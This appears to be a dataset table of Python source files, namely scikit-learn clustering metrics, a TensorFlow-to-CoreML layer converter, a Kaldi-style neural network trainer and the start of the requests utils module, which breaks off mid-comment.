gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
"""Unsupervised evaluation metrics."""
# Authors: Robert Layton <robertlayton@gmail.com>
# Arnaud Fouchet <foucheta@gmail.com>
# Thierry Guillemot <thierry.guillemot.work@gmail.com>
# License: BSD 3 clause
from __future__ import division
import functools
import numpy as np
from ...utils import check_random_state
from ...utils import check_X_y
from ...utils import safe_indexing
from ..pairwise import pairwise_distances_chunked
from ..pairwise import pairwise_distances
from ...preprocessing import LabelEncoder
def check_number_of_labels(n_labels, n_samples):
"""Check that number of labels are valid.
Parameters
----------
n_labels : int
Number of labels
n_samples : int
Number of samples
"""
if not 1 < n_labels < n_samples:
raise ValueError("Number of labels is %d. Valid values are 2 "
"to n_samples - 1 (inclusive)" % n_labels)
def silhouette_score(X, labels, metric='euclidean', sample_size=None,
random_state=None, **kwds):
"""Compute the mean Silhouette Coefficient of all samples.
The Silhouette Coefficient is calculated using the mean intra-cluster
distance (``a``) and the mean nearest-cluster distance (``b``) for each
sample. The Silhouette Coefficient for a sample is ``(b - a) / max(a,
b)``. To clarify, ``b`` is the distance between a sample and the nearest
cluster that the sample is not a part of.
Note that Silhouette Coefficient is only defined if number of labels
is 2 <= n_labels <= n_samples - 1.
This function returns the mean Silhouette Coefficient over all samples.
To obtain the values for each sample, use :func:`silhouette_samples`.
The best value is 1 and the worst value is -1. Values near 0 indicate
overlapping clusters. Negative values generally indicate that a sample has
been assigned to the wrong cluster, as a different cluster is more similar.
Read more in the :ref:`User Guide <silhouette_coefficient>`.
Parameters
----------
X : array [n_samples_a, n_samples_a] if metric == "precomputed", or, \
[n_samples_a, n_features] otherwise
Array of pairwise distances between samples, or a feature array.
labels : array, shape = [n_samples]
Predicted labels for each sample.
metric : string, or callable
The metric to use when calculating distance between instances in a
feature array. If metric is a string, it must be one of the options
allowed by :func:`metrics.pairwise.pairwise_distances
<sklearn.metrics.pairwise.pairwise_distances>`. If X is the distance
array itself, use ``metric="precomputed"``.
sample_size : int or None
The size of the sample to use when computing the Silhouette Coefficient
on a random subset of the data.
If ``sample_size is None``, no sampling is used.
random_state : int, RandomState instance or None, optional (default=None)
The generator used to randomly select a subset of samples. If int,
random_state is the seed used by the random number generator; If
RandomState instance, random_state is the random number generator; If
None, the random number generator is the RandomState instance used by
`np.random`. Used when ``sample_size is not None``.
**kwds : optional keyword parameters
Any further parameters are passed directly to the distance function.
If using a scipy.spatial.distance metric, the parameters are still
metric dependent. See the scipy docs for usage examples.
Returns
-------
silhouette : float
Mean Silhouette Coefficient for all samples.
References
----------
.. [1] `Peter J. Rousseeuw (1987). "Silhouettes: a Graphical Aid to the
Interpretation and Validation of Cluster Analysis". Computational
and Applied Mathematics 20: 53-65.
<http://www.sciencedirect.com/science/article/pii/0377042787901257>`_
.. [2] `Wikipedia entry on the Silhouette Coefficient
<https://en.wikipedia.org/wiki/Silhouette_(clustering)>`_
"""
if sample_size is not None:
X, labels = check_X_y(X, labels, accept_sparse=['csc', 'csr'])
random_state = check_random_state(random_state)
indices = random_state.permutation(X.shape[0])[:sample_size]
if metric == "precomputed":
X, labels = X[indices].T[indices].T, labels[indices]
else:
X, labels = X[indices], labels[indices]
return np.mean(silhouette_samples(X, labels, metric=metric, **kwds))
def _silhouette_reduce(D_chunk, start, labels, label_freqs):
"""Accumulate silhouette statistics for vertical chunk of X
Parameters
----------
D_chunk : shape (n_chunk_samples, n_samples)
precomputed distances for a chunk
start : int
first index in chunk
labels : array, shape (n_samples,)
corresponding cluster labels, encoded as {0, ..., n_clusters-1}
label_freqs : array
distribution of cluster labels in ``labels``
"""
# accumulate distances from each sample to each cluster
clust_dists = np.zeros((len(D_chunk), len(label_freqs)),
dtype=D_chunk.dtype)
for i in range(len(D_chunk)):
clust_dists[i] += np.bincount(labels, weights=D_chunk[i],
minlength=len(label_freqs))
# intra_index selects intra-cluster distances within clust_dists
intra_index = (np.arange(len(D_chunk)), labels[start:start + len(D_chunk)])
# intra_clust_dists are averaged over cluster size outside this function
intra_clust_dists = clust_dists[intra_index]
# of the remaining distances we normalise and extract the minimum
clust_dists[intra_index] = np.inf
clust_dists /= label_freqs
inter_clust_dists = clust_dists.min(axis=1)
return intra_clust_dists, inter_clust_dists
def silhouette_samples(X, labels, metric='euclidean', **kwds):
"""Compute the Silhouette Coefficient for each sample.
The Silhouette Coefficient is a measure of how well samples are clustered
with samples that are similar to themselves. Clustering models with a high
Silhouette Coefficient are said to be dense, where samples in the same
cluster are similar to each other, and well separated, where samples in
different clusters are not very similar to each other.
The Silhouette Coefficient is calculated using the mean intra-cluster
distance (``a``) and the mean nearest-cluster distance (``b``) for each
sample. The Silhouette Coefficient for a sample is ``(b - a) / max(a,
b)``.
Note that Silhouette Coefficient is only defined if number of labels
is 2 <= n_labels <= n_samples - 1.
This function returns the Silhouette Coefficient for each sample.
The best value is 1 and the worst value is -1. Values near 0 indicate
overlapping clusters.
Read more in the :ref:`User Guide <silhouette_coefficient>`.
Parameters
----------
X : array [n_samples_a, n_samples_a] if metric == "precomputed", or, \
[n_samples_a, n_features] otherwise
Array of pairwise distances between samples, or a feature array.
labels : array, shape = [n_samples]
label values for each sample
metric : string, or callable
The metric to use when calculating distance between instances in a
feature array. If metric is a string, it must be one of the options
allowed by :func:`sklearn.metrics.pairwise.pairwise_distances`. If X is
the distance array itself, use "precomputed" as the metric.
`**kwds` : optional keyword parameters
Any further parameters are passed directly to the distance function.
If using a ``scipy.spatial.distance`` metric, the parameters are still
metric dependent. See the scipy docs for usage examples.
Returns
-------
silhouette : array, shape = [n_samples]
Silhouette Coefficient for each samples.
References
----------
.. [1] `Peter J. Rousseeuw (1987). "Silhouettes: a Graphical Aid to the
Interpretation and Validation of Cluster Analysis". Computational
and Applied Mathematics 20: 53-65.
<http://www.sciencedirect.com/science/article/pii/0377042787901257>`_
.. [2] `Wikipedia entry on the Silhouette Coefficient
<https://en.wikipedia.org/wiki/Silhouette_(clustering)>`_
"""
X, labels = check_X_y(X, labels, accept_sparse=['csc', 'csr'])
le = LabelEncoder()
labels = le.fit_transform(labels)
n_samples = len(labels)
label_freqs = np.bincount(labels)
check_number_of_labels(len(le.classes_), n_samples)
kwds['metric'] = metric
reduce_func = functools.partial(_silhouette_reduce,
labels=labels, label_freqs=label_freqs)
results = zip(*pairwise_distances_chunked(X, reduce_func=reduce_func,
**kwds))
intra_clust_dists, inter_clust_dists = results
intra_clust_dists = np.concatenate(intra_clust_dists)
inter_clust_dists = np.concatenate(inter_clust_dists)
denom = (label_freqs - 1).take(labels, mode='clip')
with np.errstate(divide="ignore", invalid="ignore"):
intra_clust_dists /= denom
sil_samples = inter_clust_dists - intra_clust_dists
with np.errstate(divide="ignore", invalid="ignore"):
sil_samples /= np.maximum(intra_clust_dists, inter_clust_dists)
# nan values are for clusters of size 1, and should be 0
return np.nan_to_num(sil_samples)
def calinski_harabaz_score(X, labels):
"""Compute the Calinski and Harabaz score.
It is also known as the Variance Ratio Criterion.
The score is defined as ratio between the within-cluster dispersion and
the between-cluster dispersion.
Read more in the :ref:`User Guide <calinski_harabaz_index>`.
Parameters
----------
X : array-like, shape (``n_samples``, ``n_features``)
List of ``n_features``-dimensional data points. Each row corresponds
to a single data point.
labels : array-like, shape (``n_samples``,)
Predicted labels for each sample.
Returns
-------
score : float
The resulting Calinski-Harabaz score.
References
----------
.. [1] `T. Calinski and J. Harabasz, 1974. "A dendrite method for cluster
analysis". Communications in Statistics
<http://www.tandfonline.com/doi/abs/10.1080/03610927408827101>`_
"""
X, labels = check_X_y(X, labels)
le = LabelEncoder()
labels = le.fit_transform(labels)
n_samples, _ = X.shape
n_labels = len(le.classes_)
check_number_of_labels(n_labels, n_samples)
extra_disp, intra_disp = 0., 0.
mean = np.mean(X, axis=0)
for k in range(n_labels):
cluster_k = X[labels == k]
mean_k = np.mean(cluster_k, axis=0)
extra_disp += len(cluster_k) * np.sum((mean_k - mean) ** 2)
intra_disp += np.sum((cluster_k - mean_k) ** 2)
return (1. if intra_disp == 0. else
extra_disp * (n_samples - n_labels) /
(intra_disp * (n_labels - 1.)))
def davies_bouldin_score(X, labels):
"""Computes the Davies-Bouldin score.
The score is defined as the ratio of within-cluster distances to
between-cluster distances.
Read more in the :ref:`User Guide <davies-bouldin_index>`.
Parameters
----------
X : array-like, shape (``n_samples``, ``n_features``)
List of ``n_features``-dimensional data points. Each row corresponds
to a single data point.
labels : array-like, shape (``n_samples``,)
Predicted labels for each sample.
Returns
-------
score: float
The resulting Davies-Bouldin score.
References
----------
.. [1] Davies, David L.; Bouldin, Donald W. (1979).
`"A Cluster Separation Measure"
<http://ieeexplore.ieee.org/document/4766909>`__.
IEEE Transactions on Pattern Analysis and Machine Intelligence.
PAMI-1 (2): 224-227
"""
X, labels = check_X_y(X, labels)
le = LabelEncoder()
labels = le.fit_transform(labels)
n_samples, _ = X.shape
n_labels = len(le.classes_)
check_number_of_labels(n_labels, n_samples)
intra_dists = np.zeros(n_labels)
centroids = np.zeros((n_labels, len(X[0])), dtype=np.float)
for k in range(n_labels):
cluster_k = safe_indexing(X, labels == k)
centroid = cluster_k.mean(axis=0)
centroids[k] = centroid
intra_dists[k] = np.average(pairwise_distances(
cluster_k, [centroid]))
centroid_distances = pairwise_distances(centroids)
if np.allclose(intra_dists, 0) or np.allclose(centroid_distances, 0):
return 0.0
score = (intra_dists[:, None] + intra_dists) / centroid_distances
score[score == np.inf] = np.nan
return np.mean(np.nanmax(score, axis=1))
| |
from tensorflow.python.util import compat
import numpy as np
from ._interpret_shapes import _interpret_shape as interpret_shape
from ._layers_common import identity, make_tensor, skip
def _remove_beginning_unit_dimensions(in_tuple):
for i, value in enumerate(in_tuple):
if value == 1:
continue
else:
return in_tuple[i:]
def _add_const(context, name, x, output_name, shape=None):
if output_name in context.load_constants_mlmodel:
return
if shape is not None:
context.builder.add_load_constant(name, output_name, x, shape)
context.load_constants_mlmodel[output_name] = True
return
context.load_constants_mlmodel[output_name] = True
if context.use_dfs_shape_infer:
status = interpret_shape(output_name, context)
else:
status = False
if status:
rank_4_shape = context.shape_dict_rank_4[output_name]
# TODO - Interpreting 1st dimension as seq. in this case instead of batch
seq, h, w, c = rank_4_shape
x = np.reshape(x, (seq, h, w, c))
#first check the simple case: seq. dimension is 1
if seq == 1:
shape = [c, h, w] # (C, H, W)
x = np.transpose(x, [0, 3, 1, 2])
context.builder.add_load_constant(name, output_name, x, shape)
#when sequence dimension is not 1, we need some permute layers as well
#since CoreML only allows loading constant of rank-3: [C,H,W])
else:
assert c == 1 or h == 1 or w == 1, \
'Add constant: cannot add a constant in which all the dimensions ' \
'(Seq, C, H, W) are of non-unit size'
if c == 1: #swap seq. and C
x = np.transpose(x, [3, 0, 1, 2]) #(S,H,W,C) --> (C,S,H,W)
context.builder.add_load_constant(
name + '_pre_permute', output_name + '_pre_permute', x, [seq, h, w])
context.builder.add_permute(
output_name, (1, 0, 2, 3), output_name + '_pre_permute', output_name)
elif h == 1: #swap seq. and H
x = np.transpose(x, [1, 3, 0, 2]) #(S,H,W,C) --> (H,C,S,W)
context.builder.add_load_constant(
name + '_pre_permute', output_name + '_pre_permute', x, [c, seq, w])
context.builder.add_permute(
output_name, (2, 1, 0, 3), output_name + '_pre_permute', output_name)
else: # w == 1, swap seq. and W
x = np.transpose(x, [2, 3, 1, 0]) #(S,H,W,C) --> (W,C,H,S)
context.builder.add_load_constant(
name + '_pre_permute', output_name + '_pre_permute', x, [c, h, seq])
context.builder.add_permute(
output_name, (3, 1, 2, 0), output_name + '_pre_permute', output_name)
else: #Static shape mapping
shape = list(x.shape)
assert len(shape) < 5, 'Const blob shape is more than rank 4'
if len(shape) == 0:
shape = [1, 1, 1] #(1,1,1)
elif len(shape) == 1:
shape = [shape[0], 1, 1] #(C,1,1)
elif len(shape) == 2:
shape = [shape[1], 1, shape[0]] # HACK: (W,C) ---> (C,1,W) . Style transfer matrices are (W,C)
x = np.transpose(x, [1, 0])
elif len(shape) == 3:
shape = [shape[2], shape[0], shape[1]] # (H,W,C) ---> (C,H,W)
x = np.transpose(x, [2, 0, 1])
elif len(shape) == 4:
assert shape[0] == 1, 'Add Constant: Batch dimension must be 1'
shape = [shape[3], shape[1], shape[2]] #(B,H,W,C) ---> (C,H,W)
x = x[0, :, :, :] #(H,W,C)
x = np.transpose(x, [2, 0, 1])
context.builder.add_load_constant(name, output_name, x, shape)
def _add_concat(op, context):
output_name = compat.as_str_any(op.outputs[0].name)
output_shape = context.shape_dict[output_name]
axis = 3 #3 -> 'Channel', 2 -> 'Width', 1 -> 'Height
if op.type == 'Concat':
axis_name = compat.as_str_any(op.inputs[0].name)
axis = context.consts[axis_name]
input_names = []
for i, input in enumerate(op.inputs):
if i == 0:
continue
input_names.append(compat.as_str_any(input.name))
make_tensor(input, context)
if op.type == 'ConcatV2':
axis_name = compat.as_str_any(op.inputs[-1].name)
axis = context.consts[axis_name]
input_names = []
for i, input in enumerate(op.inputs):
if i == len(op.inputs) - 1:
continue
input_names.append(compat.as_str_any(input.name))
make_tensor(input, context)
if context.use_dfs_shape_infer:
status = interpret_shape(output_name, context)
else:
status = False
if status:
labeled_shape = context.dim_labels[output_name]
if labeled_shape[axis] == 'C':
axis = 3
elif labeled_shape[axis] == 'H':
axis = 1
elif labeled_shape[axis] == 'W':
axis = 2
else:
assert False, 'Concatenation supported only along channel, height or '\
'width dimensions'
else:
if len(output_shape) == 4:
assert axis in [1, 2, 3], 'Concat axis case not handled'
elif len(output_shape) == 3:
axis += 1
elif len(output_shape) == 1:
axis = 3
elif len(output_shape) == 2 and axis == 1:
#interpret this as (Batch,Channels) scenario
axis = 3
else:
assert False, ('Concat axis case not handled. output shape = {}, axis = {}'.format(str(output_shape), axis))
# Temporary workaround for fixing bugs on certain devices.
# TODO: remove this in future
# If concat's input is coming from another pool/concat: insert a linear activation layer,
# if it hasn't been inserted already
coreml_layers = context.builder.nn_spec.layers
coreml_outputs = dict()
for layer in coreml_layers:
for out in layer.output:
coreml_outputs[out] = True
for layer in coreml_layers:
if layer.WhichOneof('layer') in ['concat', 'pooling']:
for i, inp in enumerate(input_names):
if layer.output[0] == inp:
out = inp + '__linear_activation'
if out not in coreml_outputs:
context.builder.add_activation(out, 'LINEAR', inp, out, [1.0, 0])
input_names[i] = out
if axis == 3: #concatenate along channel axis
context.builder.add_elementwise(
output_name, input_names, output_name, 'CONCAT')
elif axis == 2: #concatenate along width axis
blob_postfix = '_swap_W_C_'
transpose_order = (0, 3, 2, 1)
inputs_permuted = []
for i, input_name in enumerate(input_names):
context.builder.add_permute(
output_name + '_' + str(i), transpose_order,
input_name, input_name + blob_postfix + str(i))
inputs_permuted.append(input_name + blob_postfix + str(i))
context.builder.add_elementwise(
output_name + '_concat', inputs_permuted, output_name + '_concat', 'CONCAT')
context.builder.add_permute(
output_name, transpose_order, output_name + '_concat', output_name)
elif axis == 1: #concatenate along height axis
inputs_permuted = []
for i, input_name in enumerate(input_names):
context.builder.add_permute(
output_name + '_' + str(i), (0, 2, 1, 3),
input_name, input_name + '_swap_H_C_' + str(i))
inputs_permuted.append(input_name + '_swap_H_C_' + str(i))
context.builder.add_elementwise(
output_name + '_concat', inputs_permuted, output_name + '_concat', 'CONCAT')
context.builder.add_permute(
output_name, (0, 2, 1, 3), output_name + '_concat', output_name)
else:
assert False, 'Concat axis case not handled'
context.translated[output_name] = True
# Only the case when the splits are equal and along the channel axis is handled
def _add_split(op, context):
input_tensor = op.inputs[1]
input_name = compat.as_str_any(input_tensor.name)
input_shape = context.shape_dict[input_name]
make_tensor(input_tensor, context)
if len(op.outputs) == 1 and input_shape == context.shape_dict[op.outputs[0].name]:
skip(op, context, input_name, input_id = 1 if op.type == 'Split' else 0)
return
common_out_shape = []
output_names = []
output_shapes = []
for out in op.outputs:
out_name = compat.as_str_any(out.name)
output_names.append(out_name)
out_shape = context.shape_dict[out_name]
if len(common_out_shape) == 0:
common_out_shape = out_shape
elif common_out_shape != out_shape:
assert False, 'Split op case not handled. Only equal splitting convertible to CoreML.'
if not ((len(input_shape) == 4 and len(common_out_shape) == 4 and common_out_shape[:3] == input_shape[:3]) \
or (len(input_shape) == 3 and len(common_out_shape) == 3 and common_out_shape[:2] == input_shape[:2])):
raise ValueError('Split op case not handled. Input shape = {}, output shape = {}'.format(str(input_shape), str(common_out_shape)))
context.builder.add_split(output_names[0], input_name, output_names)
for out_name in output_names: context.translated[out_name] = True
def _add_reshape(op, context):
input_name = compat.as_str_any(op.inputs[0].name)
output_name = compat.as_str_any(op.outputs[0].name)
#First make sure the the input blob exists in the CoreML graph
input_name = make_tensor(op.inputs[0], context)
input_shape = context.shape_dict[input_name]
target_shape = context.shape_dict[output_name]
squeezed_input_shape = _remove_beginning_unit_dimensions(input_shape)
squeezed_output_shape = _remove_beginning_unit_dimensions(target_shape)
if squeezed_input_shape == squeezed_output_shape:
# reshape is either squeeze or expand_dim
skip(op, context)
return
if context.use_dfs_shape_infer:
status = interpret_shape(output_name, context)
else:
status = False
if status:
target_shape = context.shape_dict_rank_4[output_name]
if interpret_shape(input_name, context):
input_shape_rank_4 = context.shape_dict_rank_4[input_name]
if input_shape_rank_4 == target_shape:
skip(op, context)
return
# When reshape is immediately followed by squeeze
if len(op.outputs) > 0 and len(op.outputs[0].consumers()) > 0 and \
op.outputs[0].consumers()[0].type == 'Squeeze':
squeezed_output_name = compat.as_str_any(
op.outputs[0].consumers()[0].outputs[0].name)
target_shape = context.shape_dict[squeezed_output_name]
# check for the pattern "reshape-softmax-reshape", it is common towards the end of graphs
if len(context.blob_graph[output_name]) == 1:
next_op = context.blob_graph[output_name][0]
if next_op.type == 'Softmax':
output_softmax = next_op.outputs[0].name
if len(context.blob_graph[output_softmax]) == 1:
next_softmax_op = context.blob_graph[output_softmax][0]
if next_softmax_op.type == 'Reshape':
final_shape = context.shape_dict[next_softmax_op.outputs[0].name]
if input_shape == final_shape:
if output_name not in context.output_names and \
output_softmax not in context.output_names:
skip(op, context)
context.skip_ops.append(next_softmax_op.name)
return
# TODO - these cases of reshape are just for mobilenet and stylenet:
# if target_shape == (1,X) ----> new_shape = (X,1,1)
# if target_shape == (X,1) -----> new_shape = (1,1,X)
assert len(target_shape) in [1, 2, 3, 4], (
'Reshape: Currently only supported if target shape is rank 2, 3 or 4')
mode = 0
if len(target_shape) == 2:
if len(input_shape) == 4 and input_shape[0] == 1 and \
target_shape[0] != 1 and target_shape[1] != 1:
# (1,H,W,C) -> (H*W, C)
new_shape = (1, target_shape[1], target_shape[0], 1)
elif target_shape[1] != 1: #(1,X)
new_shape = (1, target_shape[1], 1, 1)
if len(input_shape) == 4 or len(input_shape) == 3:
# (N,H,W,C) --> (1,C) or (N,S,C) --> (N,1,W,C)
mode = 1
else:
new_shape = (1, 1, 1, target_shape[0])
elif len(target_shape) == 3:
# Target shape is [H,W,C] --> [1, C, H, W]
new_shape = (1, target_shape[2], target_shape[0], target_shape[1])
mode = 1
elif len(target_shape) == 4:
new_shape = (
target_shape[0], target_shape[3], target_shape[1], target_shape[2])
mode = 1
elif len(target_shape) == 1:
new_shape = (1,target_shape[0],1,1)
mode = 1
else:
raise TypeError('Reshape case not handled')
context.builder.add_reshape(
output_name, input_name, output_name, new_shape, mode)
context.translated[output_name] = True
if op.type == 'QuantizedReshape':
context.translated[op.outputs[1].name] = True
context.translated[op.outputs[2].name] = True
def _add_reduce(op, context, mode):
input_name = compat.as_str_any(op.inputs[0].name)
output_name = compat.as_str_any(op.outputs[0].name)
if op.inputs[1].name in context.consts:
axis_ind = context.consts[op.inputs[1].name]
else:
axis_ind = context.session(op.inputs[1].name, feed_dict=context.input_feed_dict)
input_shape = context.shape_dict[input_name]
output_shape = context.shape_dict[output_name]
# skip if output shape is same as input shape: in that case its a dummy operation
if input_shape == output_shape:
skip(op, context)
return
if context.use_dfs_shape_infer:
status = interpret_shape(input_name, context)
else:
status = False
# convert axis_ind into a list
if axis_ind is None:
axis = 'CHW'
context.builder.add_reduce(output_name, input_name, output_name, axis, mode)
context.translated[output_name] = True
return
elif isinstance(axis_ind, int) or isinstance(axis_ind, np.int32) or isinstance(axis_ind, np.int):
axis_ind = (len(input_shape) + axis_ind) if axis_ind < 0 else axis_ind
axis_ind = [axis_ind]
elif isinstance(axis_ind, np.ndarray):
axis_ind = axis_ind.tolist()
# Determine reduction axis labels
axis = ''
if status:
labeled_shape = context.dim_labels[input_name]
for i in axis_ind:
if input_shape[i] != 1:
axis += labeled_shape[i]
axis = ''.join(sorted(axis))
else:
# check for all cases: len(input_shape) = 1,2,3,4
if len(input_shape) == len(axis_ind):
axis = 'CHW'
elif len(input_shape) == 1:
axis = 'C'
elif len(input_shape) == 2:
if len(axis_ind) == 1 and axis_ind[0] == 1: axis = 'C'
if len(axis_ind) == 1 and axis_ind[0] == 0: axis = 'W' # TODO - Handle it more robustly. Only works for stylenet. (W,C)--->(1,C)
elif len(input_shape) == 3:
for ind in [['H', 'W', 'C'][i] for i in axis_ind]:
axis += ind
axis = ''.join(sorted(axis))
elif len(input_shape) == 4:
for ind in [['B', 'H', 'W', 'C'][i] for i in axis_ind]:
axis += ind
axis = ''.join(sorted(axis))
if len(axis) > 1 and axis[0] == 'B':
axis = axis[1:]
if len(axis) == 0:
raise NotImplementedError(
'Reduce axis %s for input shape %s, output shape %s, not handled currently' %(str(axis_ind), str(input_shape), str(output_shape)))
else:
axis.replace('B','S')
assert axis in ['S', 'C', 'H', 'W', 'CHW', 'HW'], (
'Axis value %s not supported. '
'Reduction supported along C, H, W, HW, CHW dimensions only.' % axis)
# The simple case; reduction along non sequence axis
if axis != 'S':
context.builder.add_reduce(output_name, input_name, output_name, axis, mode)
# Need to permute, reduce and then permute back
else:
context.builder.add_permute(
output_name + '_swap_Seq_C', (1, 0, 2, 3), input_name, output_name + '_swap_Seq_C')
context.builder.add_reduce(
output_name + '_pre_permute', output_name + '_swap_Seq_C',
output_name + '_pre_permute', 'C', mode)
context.builder.add_permute(
output_name, (1, 0, 2, 3), output_name + '_pre_permute', output_name)
context.translated[output_name] = True
| |
'''@file nnet.py
contains the functionality for a Kaldi style neural network'''
import shutil
import os
import itertools
import numpy as np
import tensorflow as tf
import classifiers.activation
from classifiers.dnn import DNN
from trainer import CrossEnthropyTrainer
from decoder import Decoder
class Nnet(object):
'''a class for a neural network that can be used together with Kaldi'''
def __init__(self, conf, input_dim, num_labels):
'''
Nnet constructor
Args:
conf: nnet configuration
input_dim: network input dimension
num_labels: number of target labels
'''
#get nnet structure configs
self.conf = dict(conf.items('nnet'))
#define location to save neural nets
self.conf['savedir'] = (conf.get('directories', 'expdir')
+ '/' + self.conf['name'])
if not os.path.isdir(self.conf['savedir']):
os.mkdir(self.conf['savedir'])
if not os.path.isdir(self.conf['savedir'] + '/training'):
os.mkdir(self.conf['savedir'] + '/training')
#compute the input_dimension of the spliced features
self.input_dim = input_dim * (2*int(self.conf['context_width']) + 1)
if self.conf['batch_norm'] == 'True':
activation = classifiers.activation.Batchnorm(None)
else:
activation = None
#create the activation function
if self.conf['nonlin'] == 'relu':
activation = classifiers.activation.TfActivation(activation,
tf.nn.relu)
elif self.conf['nonlin'] == 'sigmoid':
activation = classifiers.activation.TfActivation(activation,
tf.nn.sigmoid)
elif self.conf['nonlin'] == 'tanh':
activation = classifiers.activation.TfActivation(activation,
tf.nn.tanh)
elif self.conf['nonlin'] == 'linear':
activation = classifiers.activation.TfActivation(activation,
lambda(x): x)
else:
raise Exception('unkown nonlinearity')
if self.conf['l2_norm'] == 'True':
activation = classifiers.activation.L2Norm(activation)
if float(self.conf['dropout']) < 1:
activation = classifiers.activation.Dropout(
activation, float(self.conf['dropout']))
#create a DNN
self.dnn = DNN(
num_labels, int(self.conf['num_hidden_layers']),
int(self.conf['num_hidden_units']), activation,
int(self.conf['add_layer_period']) > 0)
def train(self, dispenser):
'''
Train the neural network
Args:
dispenser: a batchdispenser for training
'''
#get the validation set
val_data, val_labels = zip(
*[dispenser.get_batch()
for _ in range(int(self.conf['valid_batches']))])
val_data = list(itertools.chain.from_iterable(val_data))
val_labels = list(itertools.chain.from_iterable(val_labels))
dispenser.split()
#compute the total number of steps
num_steps = int(dispenser.num_batches *int(self.conf['num_epochs']))
#set the step to the saving point that is closest to the starting step
step = (int(self.conf['starting_step'])
- int(self.conf['starting_step'])
% int(self.conf['check_freq']))
#go to the point in the database where the training was at checkpoint
for _ in range(step):
dispenser.skip_batch()
if self.conf['numutterances_per_minibatch'] == '-1':
numutterances_per_minibatch = dispenser.size
else:
numutterances_per_minibatch = int(
self.conf['numutterances_per_minibatch'])
#put the DNN in a training environment
trainer = CrossEnthropyTrainer(
self.dnn, self.input_dim, dispenser.max_input_length,
dispenser.max_target_length,
float(self.conf['initial_learning_rate']),
float(self.conf['learning_rate_decay']),
num_steps, numutterances_per_minibatch)
#start the visualization if it is requested
if self.conf['visualise'] == 'True':
if os.path.isdir(self.conf['savedir'] + '/logdir'):
shutil.rmtree(self.conf['savedir'] + '/logdir')
trainer.start_visualization(self.conf['savedir'] + '/logdir')
#start a tensorflow session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True #pylint: disable=E1101
with tf.Session(graph=trainer.graph, config=config):
#initialise the trainer
trainer.initialize()
#load the neural net if the starting step is not 0
if step > 0:
trainer.restore_trainer(self.conf['savedir']
+ '/training/step' + str(step))
#do a validation step
if val_data is not None:
validation_loss = trainer.evaluate(val_data, val_labels)
print 'validation loss at step %d: %f' % (step, validation_loss)
validation_step = step
trainer.save_trainer(self.conf['savedir']
+ '/training/validated')
num_retries = 0
#start the training iteration
while step < num_steps:
#get a batch of data
batch_data, batch_labels = dispenser.get_batch()
#update the model
loss = trainer.update(batch_data, batch_labels)
#print the progress
print 'step %d/%d loss: %f' %(step, num_steps, loss)
#increment the step
step += 1
#validate the model if required
if (step%int(self.conf['valid_frequency']) == 0
and val_data is not None):
current_loss = trainer.evaluate(val_data, val_labels)
print 'validation loss at step %d: %f' %(step, current_loss)
if self.conf['valid_adapt'] == 'True':
#if the loss increased, half the learning rate and go
#back to the previous validation step
if current_loss > validation_loss:
#go back in the dispenser
for _ in range(step-validation_step):
dispenser.return_batch()
#load the validated model
trainer.restore_trainer(self.conf['savedir']
+ '/training/validated')
trainer.halve_learning_rate()
step = validation_step
if num_retries == int(self.conf['valid_retries']):
print ('the validation loss is worse, '
'terminating training')
break
print ('the validation loss is worse, returning to '
'the previously validated model with halved '
'learning rate')
num_retries += 1
continue
else:
validation_loss = current_loss
validation_step = step
num_retries = 0
trainer.save_trainer(self.conf['savedir']
+ '/training/validated')
#add a layer if its required
if int(self.conf['add_layer_period']) > 0:
if (step%int(self.conf['add_layer_period']) == 0
and (step/int(self.conf['add_layer_period'])
< int(self.conf['num_hidden_layers']))):
print 'adding layer, the model now holds %d/%d layers'%(
step/int(self.conf['add_layer_period']) + 1,
int(self.conf['num_hidden_layers']))
trainer.control_ops['add'].run()
trainer.control_ops['init'].run()
#do a validation step
validation_loss = trainer.evaluate(val_data, val_labels)
print 'validation loss at step %d: %f' % (
step, validation_loss)
validation_step = step
trainer.save_trainer(self.conf['savedir']
+ '/training/validated')
num_retries = 0
#save the model if at checkpoint
if step%int(self.conf['check_freq']) == 0:
trainer.save_trainer(self.conf['savedir'] + '/training/step'
+ str(step))
#save the final model
trainer.save_model(self.conf['savedir'] + '/final')
#compute the state prior and write it to the savedir
prior = dispenser.compute_target_count().astype(np.float32)
prior = prior/prior.sum()
np.save(self.conf['savedir'] + '/prior.npy', prior)
def decode(self, reader, writer):
'''
compute pseudo likelihoods the testing set
Args:
reader: a feature reader object to read features to decode
writer: a writer object to write likelihoods
'''
#create a decoder
decoder = Decoder(self.dnn, self.input_dim, reader.max_input_length)
#read the prior
prior = np.load(self.conf['savedir'] + '/prior.npy')
#start tensorflow session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True #pylint: disable=E1101
with tf.Session(graph=decoder.graph, config=config):
#load the model
decoder.restore(self.conf['savedir'] + '/final')
#feed the utterances one by one to the neural net
while True:
utt_id, utt_mat, looped = reader.get_utt()
if looped:
break
#compute predictions
output = decoder(utt_mat)
#get state likelihoods by dividing by the prior
output = output/prior
#floor the values to avoid problems with log
np.where(output == 0, np.finfo(float).eps, output)
#write the pseudo-likelihoods in kaldi feature format
writer.write_next_utt(utt_id, np.log(output))
#close the writer
writer.close()
| |
# -*- coding: utf-8 -*-
"""
requests.utils
~~~~~~~~~~~~~~
This module provides utility functions that are used within Requests
that are also useful for external consumption.
"""
import cgi
import codecs
import collections
import contextlib
import io
import os
import platform
import re
import socket
import struct
import warnings
from . import __version__
from . import certs
# to_native_string is unused here, but imported here for backwards compatibility
from ._internal_utils import to_native_string
from .compat import parse_http_list as _parse_list_header
from .compat import (
quote, urlparse, bytes, str, OrderedDict, unquote, getproxies,
proxy_bypass, urlunparse, basestring, integer_types, is_py3,
proxy_bypass_environment, getproxies_environment)
from .cookies import cookiejar_from_dict
from .structures import CaseInsensitiveDict
from .exceptions import (
InvalidURL, InvalidHeader, FileModeWarning, UnrewindableBodyError)
NETRC_FILES = ('.netrc', '_netrc')
DEFAULT_CA_BUNDLE_PATH = certs.where()
if platform.system() == 'Windows':
# provide a proxy_bypass version on Windows without DNS lookups
def proxy_bypass_registry(host):
if is_py3:
import winreg
else:
import _winreg as winreg
try:
internetSettings = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
r'Software\Microsoft\Windows\CurrentVersion\Internet Settings')
proxyEnable = winreg.QueryValueEx(internetSettings,
'ProxyEnable')[0]
proxyOverride = winreg.QueryValueEx(internetSettings,
'ProxyOverride')[0]
except OSError:
return False
if not proxyEnable or not proxyOverride:
return False
# make a check value list from the registry entry: replace the
